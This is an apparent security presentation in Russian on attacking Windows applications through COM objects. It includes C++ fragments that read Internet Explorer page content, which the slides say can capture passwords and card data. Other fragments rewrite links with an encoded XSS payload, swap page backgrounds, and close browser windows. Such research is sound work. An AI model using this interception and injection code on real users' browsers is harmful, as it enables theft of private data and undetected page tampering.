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07EE-9C10-4DA9-AD4E-F5995CBCD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FE8A-BE47-4959-AF24-30AFBF6122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0B3F-A49A-41AF-BA67-CE3AC63D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393120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73F-45FB-4B1D-881E-8BB3F0F1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39312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39312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DC1-D68C-4D3E-8449-1DE02DBF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152388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152388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39312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39312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39312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5CD4-E5CA-44C5-8DA2-083D1A0B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25CF-F0FB-4351-9B4E-E90FE0D6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BF28-C9D1-49AD-BE5A-2265471E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0522-6A09-41BB-831C-4394FF69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E0E9-90D4-423B-92F2-02A238A1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C911-2791-4580-9B95-A54093B6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3EAA-D762-4191-B025-01F0859E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39312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4878-BFFA-4E8A-A2CE-3D1E362E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D183-6740-4FCE-9706-5CB0F6EB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39312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C363-0FF6-4B1B-8BEA-ED653E2C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393120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4609-898F-40D2-B4BD-AEFA5ED0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393120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36DB-7C11-441F-9F38-0E5D5F82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39312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39312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CC95-56B1-4552-8822-888E3CA0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152388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152388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39312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39312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39312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650A-1A28-4183-885D-3898B931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5D29-F87E-4935-942F-29D73BD3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3A3A-1B6C-4D78-816F-8492A707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7E8-AC02-45F3-8A93-414FECF4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282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EBA2-DB47-4A73-A7CA-CAB43D95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39312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073B-D59D-4141-872D-3E852517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39312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6A78-FC4D-4A36-93E1-9E7574F6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393120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F69-992F-490C-9EAF-1A2EC3C4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7174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71748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1397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13976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666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6094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400040"/>
            <a:ext cx="8226360" cy="320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E280-8EB8-446F-BE24-E4EF8B03B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0094-2A48-481B-87CE-A532FD372E5D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il@alisa.in" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:mail@alisa.in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93" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://ru.wikipedia.org/wiki/OLE" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://ru.wikipedia.org/wiki/Microsoft_Office" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://ru.wikipedia.org/wiki/Microsoft_Excel" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://ru.wikipedia.org/wiki/Microsoft_Word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GUID" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://ru.wikipedia.org/wiki/COM-&#1080;&#1085;&#1090;&#1077;&#1088;&#1092;&#1077;&#1081;&#1089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Windows_API" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://ru.wikipedia.org/wiki/MFC" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://ru.wikipedia.org/w/index.php?title=Active_Template_Library&amp;action=edit" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://ru.wikipedia.org/w/index.php?title=Windows_Template_Library&amp;action=edit" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://ru.wikipedia.org/wiki/C%2B%2B" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://ru.wikipedia.org/wiki/Microsoft_.NET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96" TargetMode="External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/index.php?title=DCE/RPC&amp;action=edit" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://ru.wikipedia.org/wiki/Remote_procedure_call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1720" y="49968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ерехват управления приложений, чтение и подмена пользовательского контента в приложениях при помощи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M Objects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43040" y="3857400"/>
            <a:ext cx="64008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lousova Alis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mail@alisa.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ischuk Karim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ail@ori0n.cc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лучение указателя на известный метод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аще всего нужный нам указатель на метод, нам известен заранее,  его можно получить, используя функцию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SIDFromProgID(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связк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ActiveObject()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приме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SIDFromProgID(L"VisualStudio.DTE", &amp;clsid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Unknown *pUnk = GetActiveObject(clsid0, NULL, (IUnknown**)&amp;pUnk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nk-&gt;QueryInterface(IID_IDispatch, (void **)&amp;pDisp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ComPtr&lt;EnvDTE::_DTE&gt; pDT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DTE.CoCreateInstance(clsid0, 0, CLSCTX_LOCAL_SERVER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мер в приложении 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лучение указателя на зарезервированный в системе метод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ли использовать уже зарезервированные в систем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 Objects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например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CreateInstance(CLSID_Messenger, NULL, CLSCTX_ALL, IID_IMessenger, (void **)&amp;pIMesseng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CreateInstance(CLSID_ShellWindows, NULL, CLSCTX_ALL, IID_IShellWindows, (void**)&amp;spShWin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ерехват данны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средственный перехват данных может быть реализован несколькими способами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средственным чтением данных, используя имеющийся набор методов подключенного интерфейс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Дизассемблирование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мен метод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ля этого могут подойти встроенные средства  в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 та же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A Pro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т.п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росмотр  документаци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то руководства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SDN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 файлы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DK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сторонни  исследования в этой обла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лучения методов интерфейса, через стандартный набор функци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ассмотрим ниже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лучения методов интерфейса, через стандартный набор функций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IDsOfNames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) - Преобразует имена методов (свойств) в их идентификаторы. Пример, в приложении  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TypeInfoCount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) – Возвращает число описаний типа в библиотеке тип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TypeInfo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) – возвращается указатель на интерфейс  ITypeInf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ленький пример демонстрирующий получения информации о типе TKIND_INTERFACE для дуального интерфейс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tlib-&gt;GetTypeInfo((unsigned int) dwlndex,  &amp;ptypeinfoDisp)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typeinfoDisp-&gt;GetRefTypeOfImplType(-1, &amp;phreftype)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typeinfoDisp-&gt;GetRefTypeInfo(phreftype,  &amp;ptypeinfoln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Invoke() – Предоставляет доступ к свойствам и методам  объект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оздание собственных методов перехвата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бъект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480" y="1523880"/>
            <a:ext cx="8669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ще одним способом Технология “перехвата” вызовов API функций,  может быть применена и в перехвате методов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ъектов, так называемая “техника проксирования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ъектов”, она хорошо описана в Иваном Адреевым в статье “ Перехват методов COM интерфейсов”, которую можно прочесть по адресу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http://rsdn.ru/article/com/comintercept.xml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.  Для этого используются функциями CoGetInterceptor(), CoGetInterceptorFromTypeInfo(), создают перехватчик для заданного интерфейса, специальные интерфейсы ICallFrame и ICallFrameWalker обеспечивают доступ к переданным в вызов метода in и out параметрам, что позволяет “найти” все указатели на интерфейсы среди параметров стека вызова.  Принцип технологии заключается в том, что вызов клиента перенаправляется (с помощью различных технических ухищрений - замена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TBL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x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объект и т.п.) сначала коду заместителя, который выполняет пред- и постобработку, а затем уже – исходному объекту. Благодаря этому можно добавлять новую функциональность, никак не изменяя ни код клиента, ни код серве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рафическое приме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тод собственных перехва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Рисунок 3" descr="comintercept_call_intercept.JPG"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1643040" y="2214720"/>
            <a:ext cx="55720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ерехват интерфейсов, не совместимых с autom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6760" y="1523880"/>
            <a:ext cx="8597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 того же автора есть, еще одна статья “Перехват интерфейсов, не совместимых с automation”, адрес которо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http://rsdn.ru/article/com/comintercept2.xml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ак как функция CoGetIntercptor() не умеет работать с не oleautomation-совместимыми интерфейсами, в результате перехват таких интерфейсов как  IStream, IEnumVARIANT и т.д. не возможен.  Чтобы обойти проблему перехвата не совместим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on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 можно воспользоваться двумя методам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ерехват интерфейсов, не совместимых с autom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хват с помощью IRpcChannelBuffer - Перед вызовом каждого метода интерфейса через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управление получает наша реализация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RpcChannelBuffer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Receive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Поместив в этот метод код для обработки передаваемых параметров, мы получим перехватчик, способный работать практически с любыми интерфейс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ализация перехватчика на основе NDR RPC Format Strings – В этом методе используются недокументированные функции CreateProxyFromTypeInfo() и CreateStubFromTypeInfo(), так как для automation-интерфейсов вызовы IPsFactoryBuffer::CreateProxy и IPsFactoryBuffer::CreateStub нельзя будет получить информацию об интерфейсе – proc format string и type format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Результаты перехва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результате получившегося набор для управления, чтение и записи нужный на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терфейс,  у нас появляется возможность чтение данных пользователя, которые идут через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ъект приложения в котором этот пользователь работает, изменять эти данные незаметно для пользователя и передающей стороны, иногда можно перехватывать управление,  например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Explorer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look Express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oft Office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N messager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ahoo messager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ial Studio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и т.п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иды атаки на приложения с помощью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M Object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ерехват управления приложением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олучения контента приложе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Изменение контента приложе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Вступление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;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водная о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/D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лучение указателя на методы интерфейс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ъек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ключение к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фейсу через найденный указател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хват данных через подключенный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фей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меры реализаци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SV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олучение контента прилож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бор трафика в программах, которые работают с сетью и  использующи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фейс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пример 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Explorer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бор трафика содержащего личные данные, такие как пароли, номера кредитных карт, банковские реквизиты, личная переписка. Достаточно написать несколько строчек когд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ример, получение контента прилож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480" y="1523520"/>
            <a:ext cx="866916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дключаемся к интерфейсу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ShellWindows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кон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plorer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ComPtr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ShellWindows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pShWin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;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pShWin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CreateInstance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(…..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лучаем список окон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pShWin-&gt;get_Count( &amp;nCount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оверяем принадлежность этих окон к браузеру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net Explore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ComPtr&lt;IDispatch&gt; pDisp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pShWin-&gt;Item ( CComVariant ( i ), &amp;pDisp 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ComQIPtr&lt;IWebBrowser2&gt; pIE( pDisp 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 ( pIE != NULL ) {………..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лучаем содержимое загруженной веб страницы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ComPtr&lt;IDispatch&gt; pDispDoc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IE-&gt;get_Document ( &amp;pDispDoc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HTMLDocument2* pHTMLDocumen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DispDoc-&gt;QueryInterface ( IID_IHTMLDocument2, (void**)&amp;pHTMLDocument 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ComPtr&lt;IHTMLElement&gt; pHTMLElemen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TMLDocument-&gt;get_body ( &amp;pHTMLElement ) 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STR bstrHtm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TMLElement-&gt;get_innerHTML ( &amp;bstrHtml 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PTSTR lpstrHtml = NUL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pstrHtml = W2T ( bstrHtml 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intf (“Html page text: %s \n”, lpstrHtml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зменения контента прилож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5480" y="1523520"/>
            <a:ext cx="866916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перь  давайте изменим содержимое окна браузера. Чтобы не парсить вручную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ги, воспользуемся готовыми функциями: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WebBrowser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ge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Documen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&amp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HtmlDocDispatch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HtmlDocDispatch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QueryInterface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ID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HTMLDocumen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2, (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void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**)&amp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HtmlDoc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HTMLElementCollection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Col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NUL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HtmlDoc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ge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&amp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Col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ong nLength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= 0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Col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ge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&amp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nLength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for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nt i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= 0;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&lt;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nLength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++)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{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OleVariant vIdx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(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ong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V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4); //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V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4 –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tring typ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Dispatch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ElemDispatch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NUL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HTMLElemen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*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Elem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NUL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Col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tem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vIdx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vIdx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, &amp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ElemDispatch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ElemDispatch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QueryInterface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ID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HTMLElemen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, (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void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**)&amp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Elem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BSTR bstrTagName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PTSTR lpstrHtm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NUL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Elem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ge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agName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 (&amp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bstrTagName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pstrHtm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bstrTagName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;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rintf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“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Html tag name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: %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\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”,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pstrHtm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f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trstr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pstrHtm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, “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href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”) ){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HTMLLinkElemen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inkElemen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NUL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ElemDispatch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QueryInterface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ID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_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HTMLLinkElemen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, (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void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**)&amp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inkElemen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BSTR bstrHref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PTSTR lpstrHref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NULL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inkElemen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ge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href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&amp;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bstrHref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pstrHref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bstrHref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;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rintf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(“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Html tag Href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: %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\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”,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lpstrHref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}}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следствия изменения контента прилож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8760" y="1523880"/>
            <a:ext cx="85262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писок всех имеющихся элементов и описание их методов, есть в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SDN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теперь давайте подменим, значение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ef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тоесть всех ссылок на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b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транице, которую просматривает пользователь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ля этого сразу после строки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pstrHref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strHref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;  добавляем к полученому значению, нашу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SS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(Сross Site Sсriрting) атаку или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RL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 которому будет заготовленный скрипт инфицирующий пользователя, после чего вернет управление по нужному адресу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*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eEvil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 soEvil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[] = ”#&l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G SRC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=&amp;#106;&amp;#97;&amp;#118;&amp;#97;&amp;#115;&amp;#99;&amp;#114;&amp;#105;&amp;#112;&amp;#116;&amp;#58;&amp;#97;&amp;#108;&amp;#101;&amp;#114;&amp;#116;&amp;#40;&amp;#39;&amp;#88;&amp;#83;&amp;#83;&amp;#39;&amp;#41;&gt;”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 itLen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len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()*2 +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Evil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+ 256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eEvil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*)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lloc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Len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nprintf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eEvil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Len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-1, “%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”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pstrHref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Evil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ComBSTR strEvil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eEvil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Element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t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ef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(&amp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Evil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мер подмены контен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14200" y="1523520"/>
            <a:ext cx="87408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наглядности можно менять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ckgroun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ждой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аницы. Как видно из примеров, можно менять любой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лемент, таким же образом происходит работа и с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кументами, если идет речь о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P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аницах. Одним из полезных интерфейсов является IHTMLTxtRange, его методы позволяют искать текст, подсчитывать кол-во повторений строк текста, копировать, заменять, выделять, перемещать, короче говоря производить различные манипуляции с текстом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VARIANT v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 v.intVT = 6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 short * s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 IHTMLTxtRange-&gt;execCommand(L"fontsize", false, v, s)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мер подмены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ckgroun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l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eryInterfac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I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HTMLBodyElement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    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**)&amp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BodyEl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))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BodyEl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t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ckgroun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://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vil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vil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if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")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жно менять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держимое в зависимости от ситуации, от ее наполнения, времени суток и пользователя и его уровня доступа в системе.  Один из возможных видов атак является подмена котекстной рекламы, что кстати последнее время стало часто встречатьс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етоды использующиеся в реализации подмены контен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6760" y="1523520"/>
            <a:ext cx="859788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DocumentFragment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Представляет часть дерева (хорошо подходит для операций Вырезать/Вставить)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Document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Представляет узел верхнего уровня в дерев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NodeList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Объект-итератор для доступа к узлам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TML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Node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Расширяет базовое понятие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помеченного элемента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(tagged element) в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TML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NamedNodeMap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Поддержка пространства имён и итерации для коллекций атрибут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CharacterData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Объект для манипулирования текстом Attr Представляет атрибут(ы) элемент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Element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Узел, представляющий элемент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(удобен для доступа к атрибутам)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Представляет текст, содержащийся в элементе или атрибут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ComPtr&lt;IHTMLElement&gt;spE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Disp-&gt;QueryInterface(IID_IDispatch, (LPVOID*)&amp;spEl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STR tag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l-&gt;get_tagName(&amp;tag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управления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I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CComPtr&lt;IShellWindows&gt; spShWin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if ( FAILED ( spShWin.CoCreateInstan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( __uuidof ( ShellWindows ) ) )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throw printf ( 0,"Couldn't create object SHDocVW::ShellWindows\n" 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LONG nCoun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spShWin-&gt;get_Count( &amp;nCount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Tahoma"/>
              </a:rPr>
              <a:t>for ( int i=0; i&lt;nCount; i++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n-NO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CComPtr&lt;IDispatch&gt; pDisp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spShWin-&gt;Item ( CComVariant ( i ), &amp;pDisp )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CComQIPtr&lt;IWebBrowser2&gt; pIE( pDisp )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pIE-&gt;Stop()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pIE-&gt;Refresh()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pIE-&gt;Quit()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имер обработки событий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История CO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андарт COM был разработан в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1993 год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омпанией Майкрософт как основа для развития технологии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OLE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Технология OLE 1.0 уже позволяла создавать т. н. «составные документы» например, в пакете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Microsoft Office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эта технология позволяла включать диаграммы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Microsoft Excel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документы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Microsoft Wor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андарт же COM должен был унифицировать процесс создания, внедрения и связывания таких внедряемых объектов, а также стандартизировать разработку приложений, использующих внедряемые объек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инципы работы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5840" y="1500120"/>
            <a:ext cx="85010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новным понятием, которым оперирует технология COM, является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COM-компонент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Программы, построенные на технологии COM, фактически не являются автономными программами, а представляют собой набор взаимодействующих между собой COM-компонентов. Каждый компонент имеет уникальный идентификатор (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GUID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 и может одновременно использоваться многими программами. Компонент взаимодействует с другими программами через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COM-интерфейс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— наборы абстрактных функций и свойств. Каждый COM-компонент должен, как минимум, поддерживать стандартный интерфейс «IUnknown», который предоставляет базовые средства для работы с компонент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/DCOM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и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indows AP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indows AP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редоставляет базовые функции, позволяющие использовать COM-компоненты. Библиотеки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FC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, особенно,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ATL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WTL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редоставляют гораздо более гибкие и удобные средства для работы с COM. Библиотека ATL от Майкрософт до сих пор остаётся самым популярным средством создания COM-компонентов. Но, зачастую, COM-разработка остаётся ещё довольно сложным делом, программистам приходится вручную выполнять многие рутинные задачи, связанные с COM (особенно это заметно в случае разработки на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C++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. Впоследствии (в технологиях COM+ и особенно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.NET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 Майкрософт попыталась упростить задачу разработки COM-компонент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Развитие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пущенная в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1996 году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технология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DCOM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англ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Distributed COM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— распределённая COM) основана на технологии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DCE/RPC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разновидности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RPC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 и является развитием COM. DCOM позволяет COM-компонентам взаимодействовать друг с другом по сети. Главным конкурентом DCOM является другая известная распределённая технология — CORB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составе Windows 2000 была выпущена технология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COM+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которая расширяла возможности разработчиков COM-компонентов, предоставляя им некоторые готовые услуг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лучшенную поддержку потоков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оступ к контексту, в котором выполняется компонент (например, компоненты, используемые в ASP, могут с этой возможностью получить доступ к внутренним объектам той страницы, на которой они выполняются)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.NET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и будущее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2002 году была официально выпущена платформа Microsoft .NET, которая на сегодняшний день объявлена Майкрософт рекомендуемой основой для создания приложений и компонентов под Windows. По этой причине в .NET включены и средства, позволяющие обращаться к компонентам COM из приложений .NET, и наоборот. По словам представителей Майкрософт, COM (точнее, COM+) и .NET являются отлично взаимодополняющими технологиями. Также было заявлено, что Windows Vista будет построена с использованием технологий .NET и COM+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oofing by COM Objec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льшое количество программного обеспечения имеет в своем распоряжении интерфейс управления и передачи данных, при помощ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 Сomponent Object Model ) объект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хват данных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 Objects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водится к трем основным этапа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лучение указателя на методы интерфейс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ъект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ключение к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терфейсу через найденный указател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хват данных через подключенный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терфей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ерехват методов интерфейса IUnknow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тобы получить не известный нам указатель на нужный метод, можно воспользоваться методом, который описан Алексей Остапенко  в статье “ Перехват методов интерфейса IUnknown”, по адрес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http://www.rsdn.ru/article/com/qihook.xml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 Суть этого подхода заключается в замене указателей на функции QueryInterace, AddRef, Release в VTBL интерфейса и выполнении дополнительной обработки внутри перехватчи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к как интерфейс  IUnknown является базовым интерфейсом для COM/DCOM и все интерфейсы являются его наследниками, то мы можем получить доступ к любому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ъекту в приделах доступа по DACL  (Discretionary Access-Control List). В результате IUnknown  и даст необходимый нам указатель  на мето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4:26:47Z</dcterms:created>
  <dc:creator>Dan Berger</dc:creator>
  <dc:description/>
  <dc:language>en-US</dc:language>
  <cp:lastModifiedBy>alice</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2007-12-01T10:40:31Z</dcterms:modified>
  <cp:revision>135</cp:revision>
  <dc:subject/>
  <dc:title>COM: A Brief Introduction</dc:title>
</cp:coreProperties>
</file>